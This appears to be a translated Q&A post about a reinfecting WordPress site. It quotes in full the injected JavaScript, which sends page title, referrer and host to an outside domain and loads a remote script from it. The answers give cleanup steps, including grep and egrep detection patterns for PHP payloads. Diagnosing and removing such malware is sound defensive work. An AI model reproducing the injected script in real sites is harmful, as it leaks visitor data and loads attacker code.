jQuery.min.php Вредоносные программы на моем сайте
Нужна помощь от любого, кто знаком с jquery Malware. Я был заражен Injected Script на моем веб-сайте WordPress, и каждый раз, когда я удаляю Injected Code из моего Header.php, через 24 часа он внедряет его модифицированную версию обратно в файлы Header.php на моем хост-сервере.
Сводит меня с ума. Сайт www.icrsolutions.co.uk и сценарий гласит:
<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://uniluxvfc.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>
Решение
Следующее относится и к Joomla:
- Измените все ваши пароли.
- Обновите вашу установку и любые дополнения / модули до последних версий.
- Определите и очистите все файлы, содержащие вредоносный скрипт. В Linux вы можете использовать следующее для поиска файлов:
grep -r jquery.min.php <webserver directory> | awk -F\: '{ print $1 }' - Очистите все файлы, содержащие любую «полезную нагрузку». В Linux вы можете использовать следующее для идентификации этих файлов. Там будут ложные срабатывания, поэтому, если вы сомневаетесь, проверьте файл на свежую копию вашей CMS.
egrep -Rl '\$GLOBALS.*\\x|GLO.*SERVER|\$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval' <webserver directory> 2>/dev/null
Другие решения
Измените каждый пароль, а затем удалите скрипты / вредоносный код.
Затем, после этого, обновите каждый плагин и сам WordPress.